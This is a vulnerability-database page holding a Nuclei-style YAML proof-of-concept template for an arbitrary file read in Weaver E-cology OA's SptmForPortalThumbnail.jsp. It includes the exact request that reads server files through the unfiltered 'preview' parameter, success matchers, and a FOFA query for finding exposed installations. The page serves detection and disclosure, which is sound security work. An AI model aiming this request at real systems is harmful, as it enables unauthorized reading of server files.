weaver-sptmforportalthumbnail-lfi: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read

2025-08-01 E-Weaver SptmForPortalThumbnail PoC Public

Description

The controllable preview parameters of SptmForPortalThumbnail.jsp are not filtered and are directly spliced to the web root directory for file downloading.

PoC

id: weaver-sptmforportalthumbnail-lfi

info:
  name: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read
  author: SleepingBag945
  severity: high
  description: |
    The controllable preview parameters of SptmForPortalThumbnail.jsp are not filtered and are directly spliced to the web root directory for file downloading.
  reference:
    - http://124.223.89.192/archives/e-cology8-14
    - https://github.com/GREENHAT7/pxplan/blob/main/xray_pocs/yaml-poc-weaver-weaver_e_cology_oa-readfile-CT-479157.yml
  classification:
    cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
    cwe-id: CWE-22,CWE-73
  metadata:
    verified: true
    max-request: 1
    vendor: weaver
    product: e-cology
    fofa-query: app="泛微-E-Weaver"
  tags: weaver,e-cology,oa,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "weaver.general.BaseBean"
          - "getServletConfig"
        condition: and

      - type: word
        part: header
        words:
          - "image/png"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100efa47ceb51790c25fa5e7e06c3a04fa3ac178451420b59fdfefbbe6ad8239a250221009f6e842f98d62ff26f2ff1db66f3fbdb96ac376f1a40cbde39cb9dc455509e0c:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities